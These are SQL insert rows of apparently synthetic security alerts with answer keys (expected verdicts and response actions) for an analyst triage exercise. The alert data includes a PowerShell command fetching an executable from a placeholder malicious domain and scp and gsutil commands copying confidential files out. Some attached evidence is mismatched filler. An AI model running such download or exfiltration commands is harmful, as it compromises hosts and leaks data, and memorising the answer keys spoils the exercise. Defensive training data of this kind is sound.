(1267, 'Potential Insider Threat Detected with Unauthorized File Access', 'high', 'Forcepoint', 'An employee attempted to access and download files that are beyond their access level, suggesting potential insider threat activity.', 'Data Exfil', 'T1071', 1, 'New', NULL, '{\"timestamp\":\"2026-02-24T11:25:50Z\",\"event_type\":\"file_access\",\"src_ip\":\"192.168.4.55\",\"dst_ip\":null,\"username\":\"michael.jones\",\"hostname\":\"CORP-DESK-07\",\"request_body\":null,\"command_line\":\"scp secret_document.pdf michael@192.168.4.55:/home/michael/\"}', '2026-02-24 03:10:37', '2026-02-24 04:22:04', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.4.55\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP used for unauthorized file access\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"scp secret_document.pdf michael@192.168.4.55:/home/michael/\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"suspicious\",\"details\":\"Command indicates potential unauthorized file transfer\"}}],\"expected_actions\":[\"isolate_host\",\"collect_forensics\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"The access attempt to restricted files by an employee indicates a potential insider threat.\"}', 'Intermediate', 'DLP', 5, 1, 'FINANCE', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-24T04:22:04.711Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-24T11:25:50Z\\\",\\\"event_type\\\":\\\"file_access\\\",\\\"src_ip\\\":\\\"192.168.4.55\\\",\\\"dst_ip\\\":null,\\\"username\\\":\\\"michael.jones\\\",\\\"hostname\\\":\\\"CORP-DESK-07\\\",\\\"request_body\\\":null,\\\"command_line\\\":\\\"scp secret_document.pdf michael@192.168.4.55:/home/michael/\\\"}\"},{\"timestamp\":\"2026-02-24T04:21:04.711Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-24T11:25:50Z\\\",\\\"event_type\\\":\\\"file_access\\\",\\\"src_ip\\\":\\\"192.168.4.55\\\",\\\"dst_ip\\\":null,\\\"username\\\":\\\"michael.jones\\\",\\\"hostname\\\":\\\"CORP-DESK-07\\\",\\\"request_body\\\":null,\\\"command_line\\\":\\\"scp secret_document.pdf michael@192.168.4.55:/home/michael/\\\"}\"},{\"timestamp\":\"2026-02-24T04:20:04.711Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-24T11:25:50Z\\\",\\\"event_type\\\":\\\"file_access\\\",\\\"src_ip\\\":\\\"192.168.4.55\\\",\\\"dst_ip\\\":null,\\\"username\\\":\\\"michael.jones\\\",\\\"hostname\\\":\\\"CORP-DESK-07\\\",\\\"request_body\\\":null,\\\"command_line\\\":\\\"scp secret_document.pdf michael@192.168.4.55:/home/michael/\\\"}\"},{\"timestamp\":\"2026-02-24T04:19:04.711Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-24T11:25:50Z\\\",\\\"event_type\\\":\\\"file_access\\\",\\\"src_ip\\\":\\\"192.168.4.55\\\",\\\"dst_ip\\\":null,\\\"username\\\":\\\"michael.jones\\\",\\\"hostname\\\":\\\"CORP-DESK-07\\\",\\\"request_body\\\":null,\\\"command_line\\\":\\\"scp secret_document.pdf michael@192.168.4.55:/home/michael/\\\"}\"},{\"timestamp\":\"2026-02-24T04:18:04.711Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-24T11:25:50Z\\\",\\\"event_type\\\":\\\"file_access\\\",\\\"src_ip\\\":\\\"192.168.4.55\\\",\\\"dst_ip\\\":null,\\\"username\\\":\\\"michael.jones\\\",\\\"hostname\\\":\\\"CORP-DESK-07\\\",\\\"request_body\\\":null,\\\"command_line\\\":\\\"scp secret_document.pdf michael@192.168.4.55:/home/michael/\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(1268, 'Suspicious PowerShell Execution Detected', 'medium', 'Microsoft Purview', 'A PowerShell script was executed on an internal machine that attempted to download a file from a suspicious domain.', 'Malware', 'T1059.001', 0, 'New', NULL, '{\"timestamp\":\"2026-02-24T07:30:45Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.5.60\",\"dst_ip\":\"203.0.113.77\",\"username\":\"john.doe\",\"hostname\":\"CORP-PS-01\",\"request_body\":null,\"command_line\":\"powershell.exe -Command \\\"Invoke-WebRequest -Uri http://suspicious-domain.com/file.exe -OutFile C:\\\\Temp\\\\file.exe\\\"\"}', '2026-02-24 03:10:37', '2026-02-24 04:22:04', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.5.60\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP executing suspicious PowerShell command\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.77\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP associated with hosting malicious content\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"powershell.exe -Command \\\"Invoke-WebRequest -Uri http://suspicious-domain.com/file.exe -OutFile C:\\\\Temp\\\\file.exe\\\"\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Command used to download potentially malicious executeable\"}}],\"expected_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The PowerShell command indicates an attempt to download potentially malicious files from a known malicious domain.\"}', 'Intermediate', 'DLP', 5, 1, 'TECH', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-24T04:22:04.712Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-24T07:30:45Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.5.60\\\",\\\"dst_ip\\\":\\\"203.0.113.77\\\",\\\"username\\\":\\\"john.doe\\\",\\\"hostname\\\":\\\"CORP-PS-01\\\",\\\"request_body\\\":null,\\\"command_line\\\":\\\"powershell.exe -Command \\\\\\\"Invoke-WebRequest -Uri http://suspicious-domain.com/file.exe -OutFile C:\\\\\\\\Temp\\\\\\\\file.exe\\\\\\\"\\\"}\"},{\"timestamp\":\"2026-02-24T04:21:04.712Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-24T07:30:45Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.5.60\\\",\\\"dst_ip\\\":\\\"203.0.113.77\\\",\\\"username\\\":\\\"john.doe\\\",\\\"hostname\\\":\\\"CORP-PS-01\\\",\\\"request_body\\\":null,\\\"command_line\\\":\\\"powershell.exe -Command \\\\\\\"Invoke-WebRequest -Uri http://suspicious-domain.com/file.exe -OutFile C:\\\\\\\\Temp\\\\\\\\file.exe\\\\\\\"\\\"}\"},{\"timestamp\":\"2026-02-24T04:20:04.712Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-24T07:30:45Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.5.60\\\",\\\"dst_ip\\\":\\\"203.0.113.77\\\",\\\"username\\\":\\\"john.doe\\\",\\\"hostname\\\":\\\"CORP-PS-01\\\",\\\"request_body\\\":null,\\\"command_line\\\":\\\"powershell.exe -Command \\\\\\\"Invoke-WebRequest -Uri http://suspicious-domain.com/file.exe -OutFile C:\\\\\\\\Temp\\\\\\\\file.exe\\\\\\\"\\\"}\"},{\"timestamp\":\"2026-02-24T04:19:04.712Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-24T07:30:45Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.5.60\\\",\\\"dst_ip\\\":\\\"203.0.113.77\\\",\\\"username\\\":\\\"john.doe\\\",\\\"hostname\\\":\\\"CORP-PS-01\\\",\\\"request_body\\\":null,\\\"command_line\\\":\\\"powershell.exe -Command \\\\\\\"Invoke-WebRequest -Uri http://suspicious-domain.com/file.exe -OutFile C:\\\\\\\\Temp\\\\\\\\file.exe\\\\\\\"\\\"}\"},{\"timestamp\":\"2026-02-24T04:18:04.712Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-24T07:30:45Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.5.60\\\",\\\"dst_ip\\\":\\\"203.0.113.77\\\",\\\"username\\\":\\\"john.doe\\\",\\\"hostname\\\":\\\"CORP-PS-01\\\",\\\"request_body\\\":null,\\\"command_line\\\":\\\"powershell.exe -Command \\\\\\\"Invoke-WebRequest -Uri http://suspicious-domain.com/file.exe -OutFile C:\\\\\\\\Temp\\\\\\\\file.exe\\\\\\\"\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1269, 'False Positive: Authorized Software Update Detected', 'low', 'Forcepoint', 'A network connection was established to download a software update from an approved vendor. Initially flagged as suspicious due to the large data transfer.', 'Data Exfil', 'T1071', 0, 'New', NULL, '{\"timestamp\":\"2026-02-24T09:00:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.6.33\",\"dst_ip\":\"203.0.113.80\",\"username\":\"service.account\",\"hostname\":\"CORP-SERVER-03\",\"request_body\":null,\"command_line\":null}', '2026-02-24 03:10:37', '2026-02-24 04:22:04', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.6.33\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal server IP performing authorized update\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.80\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"IP associated with a trusted software vendor\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"The network activity was verified as a legitimate software update from an approved vendor.\"}', 'Intermediate', 'DLP', 5, 1, 'ENERGY', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-24T04:22:04.714Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-24T09:00:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.6.33\\\",\\\"dst_ip\\\":\\\"203.0.113.80\\\",\\\"username\\\":\\\"service.account\\\",\\\"hostname\\\":\\\"CORP-SERVER-03\\\",\\\"request_body\\\":null,\\\"command_line\\\":null}\"},{\"timestamp\":\"2026-02-24T04:21:04.714Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-24T09:00:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.6.33\\\",\\\"dst_ip\\\":\\\"203.0.113.80\\\",\\\"username\\\":\\\"service.account\\\",\\\"hostname\\\":\\\"CORP-SERVER-03\\\",\\\"request_body\\\":null,\\\"command_line\\\":null}\"},{\"timestamp\":\"2026-02-24T04:20:04.714Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-24T09:00:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.6.33\\\",\\\"dst_ip\\\":\\\"203.0.113.80\\\",\\\"username\\\":\\\"service.account\\\",\\\"hostname\\\":\\\"CORP-SERVER-03\\\",\\\"request_body\\\":null,\\\"command_line\\\":null}\"},{\"timestamp\":\"2026-02-24T04:19:04.714Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-24T09:00:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.6.33\\\",\\\"dst_ip\\\":\\\"203.0.113.80\\\",\\\"username\\\":\\\"service.account\\\",\\\"hostname\\\":\\\"CORP-SERVER-03\\\",\\\"request_body\\\":null,\\\"command_line\\\":null}\"},{\"timestamp\":\"2026-02-24T04:18:04.714Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-24T09:00:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.6.33\\\",\\\"dst_ip\\\":\\\"203.0.113.80\\\",\\\"username\\\":\\\"service.account\\\",\\\"hostname\\\":\\\"CORP-SERVER-03\\\",\\\"request_body\\\":null,\\\"command_line\\\":null}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(1270, 'Suspicious File Transfer Detected via Cloud Service', 'medium', 'Netskope', 'Detected unexpected file uploads to a cloud storage service from a user\'s machine. Further analysis needed to confirm intent.', 'Data Exfil', 'T1567', 0, 'New', NULL, '{\"timestamp\":\"2026-02-24T12:30:00Z\",\"event_type\":\"file_upload\",\"src_ip\":\"192.168.7.22\",\"dst_ip\":\"198.51.100.10\",\"username\":\"alice.jones\",\"hostname\":\"CORP-LT-08\",\"request_body\":null,\"command_line\":\"gsutil cp /home/alice/documents/confidential.xlsx gs://unknown-bucket\"}', '2026-02-24 03:10:37', '2026-02-24 04:22:04', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.7.22\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP involved in file upload\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"gsutil cp /home/alice/documents/confidential.xlsx gs://unknown-bucket\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"suspicious\",\"details\":\"Unknown cloud storage service used for file upload\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"The use of cloud storage for file uploads by an internal user indicates potential data exfiltration.\"}', 'Intermediate', 'DLP', 5, 1, 'RETAIL', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-24T04:22:04.716Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-24T12:30:00Z\\\",\\\"event_type\\\":\\\"file_upload\\\",\\\"src_ip\\\":\\\"192.168.7.22\\\",\\\"dst_ip\\\":\\\"198.51.100.10\\\",\\\"username\\\":\\\"alice.jones\\\",\\\"hostname\\\":\\\"CORP-LT-08\\\",\\\"request_body\\\":null,\\\"command_line\\\":\\\"gsutil cp /home/alice/documents/confidential.xlsx gs://unknown-bucket\\\"}\"},{\"timestamp\":\"2026-02-24T04:21:04.716Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-24T12:30:00Z\\\",\\\"event_type\\\":\\\"file_upload\\\",\\\"src_ip\\\":\\\"192.168.7.22\\\",\\\"dst_ip\\\":\\\"198.51.100.10\\\",\\\"username\\\":\\\"alice.jones\\\",\\\"hostname\\\":\\\"CORP-LT-08\\\",\\\"request_body\\\":null,\\\"command_line\\\":\\\"gsutil cp /home/alice/documents/confidential.xlsx gs://unknown-bucket\\\"}\"},{\"timestamp\":\"2026-02-24T04:20:04.716Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-24T12:30:00Z\\\",\\\"event_type\\\":\\\"file_upload\\\",\\\"src_ip\\\":\\\"192.168.7.22\\\",\\\"dst_ip\\\":\\\"198.51.100.10\\\",\\\"username\\\":\\\"alice.jones\\\",\\\"hostname\\\":\\\"CORP-LT-08\\\",\\\"request_body\\\":null,\\\"command_line\\\":\\\"gsutil cp /home/alice/documents/confidential.xlsx gs://unknown-bucket\\\"}\"},{\"timestamp\":\"2026-02-24T04:19:04.716Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-24T12:30:00Z\\\",\\\"event_type\\\":\\\"file_upload\\\",\\\"src_ip\\\":\\\"192.168.7.22\\\",\\\"dst_ip\\\":\\\"198.51.100.10\\\",\\\"username\\\":\\\"alice.jones\\\",\\\"hostname\\\":\\\"CORP-LT-08\\\",\\\"request_body\\\":null,\\\"command_line\\\":\\\"gsutil cp /home/alice/documents/confidential.xlsx gs://unknown-bucket\\\"}\"},{\"timestamp\":\"2026-02-24T04:18:04.716Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-24T12:30:00Z\\\",\\\"event_type\\\":\\\"file_upload\\\",\\\"src_ip\\\":\\\"192.168.7.22\\\",\\\"dst_ip\\\":\\\"198.51.100.10\\\",\\\"username\\\":\\\"alice.jones\\\",\\\"hostname\\\":\\\"CORP-LT-08\\\",\\\"request_body\\\":null,\\\"command_line\\\":\\\"gsutil cp /home/alice/documents/confidential.xlsx gs://unknown-bucket\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1271, 'False Positive: Routine Database Synchronization Detected', 'low', 'Microsoft Purview', 'Routine database synchronization detected between internal servers, flagged due to high data volume but confirmed as scheduled activity.', 'Data Exfil', 'T1071', 0, 'Closed', 213, '{\"timestamp\":\"2026-02-24T02:00:00Z\",\"event_type\":\"data_transfer\",\"src_ip\":\"192.168.8.50\",\"dst_ip\":\"192.168.8.51\",\"username\":\"db_sync\",\"hostname\":\"DB-SERVER-02\",\"request_body\":null,\"command_line\":null}', '2026-02-24 03:10:37', '2026-02-26 21:24:47', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.8.50\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"IP of internal database server\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.8.51\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"IP of internal database server\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"The data transfer was confirmed as part of routine database synchronization between internal servers.\"}', 'Intermediate', 'DLP', 5, 1, 'TECH', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-24T04:22:04.717Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-24T02:00:00Z\\\",\\\"event_type\\\":\\\"data_transfer\\\",\\\"src_ip\\\":\\\"192.168.8.50\\\",\\\"dst_ip\\\":\\\"192.168.8.51\\\",\\\"username\\\":\\\"db_sync\\\",\\\"hostname\\\":\\\"DB-SERVER-02\\\",\\\"request_body\\\":null,\\\"command_line\\\":null}\"},{\"timestamp\":\"2026-02-24T04:21:04.717Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-24T02:00:00Z\\\",\\\"event_type\\\":\\\"data_transfer\\\",\\\"src_ip\\\":\\\"192.168.8.50\\\",\\\"dst_ip\\\":\\\"192.168.8.51\\\",\\\"username\\\":\\\"db_sync\\\",\\\"hostname\\\":\\\"DB-SERVER-02\\\",\\\"request_body\\\":null,\\\"command_line\\\":null}\"},{\"timestamp\":\"2026-02-24T04:20:04.717Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-24T02:00:00Z\\\",\\\"event_type\\\":\\\"data_transfer\\\",\\\"src_ip\\\":\\\"192.168.8.50\\\",\\\"dst_ip\\\":\\\"192.168.8.51\\\",\\\"username\\\":\\\"db_sync\\\",\\\"hostname\\\":\\\"DB-SERVER-02\\\",\\\"request_body\\\":null,\\\"command_line\\\":null}\"},{\"timestamp\":\"2026-02-24T04:19:04.717Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-24T02:00:00Z\\\",\\\"event_type\\\":\\\"data_transfer\\\",\\\"src_ip\\\":\\\"192.168.8.50\\\",\\\"dst_ip\\\":\\\"192.168.8.51\\\",\\\"username\\\":\\\"db_sync\\\",\\\"hostname\\\":\\\"DB-SERVER-02\\\",\\\"request_body\\\":null,\\\"command_line\\\":null}\"},{\"timestamp\":\"2026-02-24T04:18:04.717Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-24T02:00:00Z\\\",\\\"event_type\\\":\\\"data_transfer\\\",\\\"src_ip\\\":\\\"192.168.8.50\\\",\\\"dst_ip\\\":\\\"192.168.8.51\\\",\\\"username\\\":\\\"db_sync\\\",\\\"hostname\\\":\\\"DB-SERVER-02\\\",\\\"request_body\\\":null,\\\"command_line\\\":null}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1272, 'False Positive: Network Configuration Change Detected', 'low', 'Symantec DLP', 'A network configuration change was detected on a router by an authorized user. Initially flagged due to unusual time of change.', 'Lateral Movement', 'T1078', 0, 'New', NULL, '{\"timestamp\":\"2026-02-24T04:30:00Z\",\"event_type\":\"configuration_change\",\"src_ip\":\"192.168.9.10\",\"dst_ip\":\"192.168.9.1\",\"username\":\"network.admin\",\"hostname\":\"ROUTER-01\",\"request_body\":null,\"command_line\":\"apply_changes.sh\"}', '2026-02-24 03:10:37', '2026-02-24 04:22:04', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.9.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"IP of authorized network admin machine\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"apply_changes.sh\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Routine network configuration script\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"The configuration change was performed by an authorized user during scheduled maintenance.\"}', 'Intermediate', 'DLP', 5, 1, 'ENERGY', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-24T04:22:04.719Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-24T04:30:00Z\\\",\\\"event_type\\\":\\\"configuration_change\\\",\\\"src_ip\\\":\\\"192.168.9.10\\\",\\\"dst_ip\\\":\\\"192.168.9.1\\\",\\\"username\\\":\\\"network.admin\\\",\\\"hostname\\\":\\\"ROUTER-01\\\",\\\"request_body\\\":null,\\\"command_line\\\":\\\"apply_changes.sh\\\"}\"},{\"timestamp\":\"2026-02-24T04:21:04.719Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-24T04:30:00Z\\\",\\\"event_type\\\":\\\"configuration_change\\\",\\\"src_ip\\\":\\\"192.168.9.10\\\",\\\"dst_ip\\\":\\\"192.168.9.1\\\",\\\"username\\\":\\\"network.admin\\\",\\\"hostname\\\":\\\"ROUTER-01\\\",\\\"request_body\\\":null,\\\"command_line\\\":\\\"apply_changes.sh\\\"}\"},{\"timestamp\":\"2026-02-24T04:20:04.719Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-24T04:30:00Z\\\",\\\"event_type\\\":\\\"configuration_change\\\",\\\"src_ip\\\":\\\"192.168.9.10\\\",\\\"dst_ip\\\":\\\"192.168.9.1\\\",\\\"username\\\":\\\"network.admin\\\",\\\"hostname\\\":\\\"ROUTER-01\\\",\\\"request_body\\\":null,\\\"command_line\\\":\\\"apply_changes.sh\\\"}\"},{\"timestamp\":\"2026-02-24T04:19:04.719Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-24T04:30:00Z\\\",\\\"event_type\\\":\\\"configuration_change\\\",\\\"src_ip\\\":\\\"192.168.9.10\\\",\\\"dst_ip\\\":\\\"192.168.9.1\\\",\\\"username\\\":\\\"network.admin\\\",\\\"hostname\\\":\\\"ROUTER-01\\\",\\\"request_body\\\":null,\\\"command_line\\\":\\\"apply_changes.sh\\\"}\"},{\"timestamp\":\"2026-02-24T04:18:04.719Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-24T04:30:00Z\\\",\\\"event_type\\\":\\\"configuration_change\\\",\\\"src_ip\\\":\\\"192.168.9.10\\\",\\\"dst_ip\\\":\\\"192.168.9.1\\\",\\\"username\\\":\\\"network.admin\\\",\\\"hostname\\\":\\\"ROUTER-01\\\",\\\"request_body\\\":null,\\\"command_line\\\":\\\"apply_changes.sh\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0);
